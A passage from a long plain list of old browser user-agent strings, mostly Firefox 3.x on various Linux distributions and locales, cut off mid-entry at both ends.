en-US; rv:1.9.0.2) Gecko/2008110715 ASPLinux/3.0.2-3.0.120asp Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3pre) Gecko/2008090713 Firefox/3.0.3pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4pre) Gecko/2008101311 Firefox/3.0.4pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Linux Mint/6 (Felicia) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121718 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux 
i686; en-US; rv:1.9.0.5) Gecko/2008121914 Ubuntu/8.04 (hardy) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2009011301 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc10 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020518 Ubuntu/9.04 (jaunty) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020616 Gentoo Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6 FirePHP/0.2.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022111 Gentoo Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022714 Ubuntu/9.04 (jaunty) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009032018 Firefox/3.0.4 (Debian-3.0.6-1) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009040820 Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009041408 Red Hat/3.0.9-1.el5 Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Linux Mint/6 (Felicia) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1) Gecko/20090701 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Slackware/13.0 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2pre) Gecko/20090729 Ubuntu/9.04 (jaunty) Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090919 Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091028 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100315 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b3) Gecko/20090407 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 FirePHP/0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Ubuntu/10.04 (lucid) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100128 Gentoo Firefox/3.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.1) Gecko/20100122 firefox/3.6.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.04 (jaunty) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100312 Ubuntu/9.04 (jaunty) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100404 Ubuntu/10.04 (lucid) Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo 
Firefox/3.6.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100727 Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/3.0a1 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3) Gecko/2008020513 Firefox/3.0b3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008010415 Firefox/3.0b -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008020507 Firefox/3.0b3pre -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4) Gecko/2008031317 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021712 Firefox/3.0b4pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021714 Firefox/3.0b4pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9pre) Gecko/2008040318 Firefox/3.0pre (Swiftfox) -Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; en; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Linux Mint/5 (Elyssa) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060309 Linux Mint/5 (Elyssa) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060310 Ubuntu/8.10 (intrepid) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.14) Gecko/2009090216 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 GTB6 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686; eu; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1.2 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.13) Gecko/2009080315 Linux Mint/6 (Felicia) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 
-Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.0.5) Gecko/2008123017 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.03 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009031218 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 -Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.10) Gecko/2009042718 CentOS/3.0.10-1.el5.centos Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 FirePHP/0.2.4 -Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-1.fc12 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9) Gecko/2008061015 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc10 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.4) Gecko/2008111217 Red Hat Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9) Gecko/2008061015 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; nl; 
rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092700 SUSE/3.0.3-2.2 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.4) Gecko/20081031100 SUSE/3.0.4-4.6 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121300 SUSE/3.0.5-0.1 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121622 Slackware/2.6.27-PiP Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030422 Kubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc10 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b4) Gecko/2008030800 SUSE/2.9.94-4.2 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.2) Gecko/20090804 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.2a1pre) Gecko/20090405 Ubuntu/9.04 (jaunty) Firefox/3.6a1pre -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9) Gecko/2008061812 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) 
Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.3a5pre) Gecko/20100526 Firefox/3.7a5pre -Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/2008080808 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/20080810020329 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9) Gecko/2008061015 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.1) Gecko/20090630 Fedora/3.5-1.fc11 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.6) Gecko/20091216 Fedora/3.5.6-1.fc11 Firefox/3.5.6 GTB6 -Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.2.8) Gecko/20100722 Ubuntu/10.04 (lucid) Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux ia64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux ppc; en-GB; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x64_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86; es-ES; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64) Gecko/2008072820 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.11) Gecko/2009070611 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008090713 
Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.7) Gecko/2009030620 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.1.10) Gecko/20100506 SUSE/3.5.10-0.1.1 Firefox/3.5.10 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux x86_64; el-GR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 FirePHP/0.1.1.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 FirePHP/0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.5) Gecko/2008122010 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc9 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 FirePHP/0.2.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) 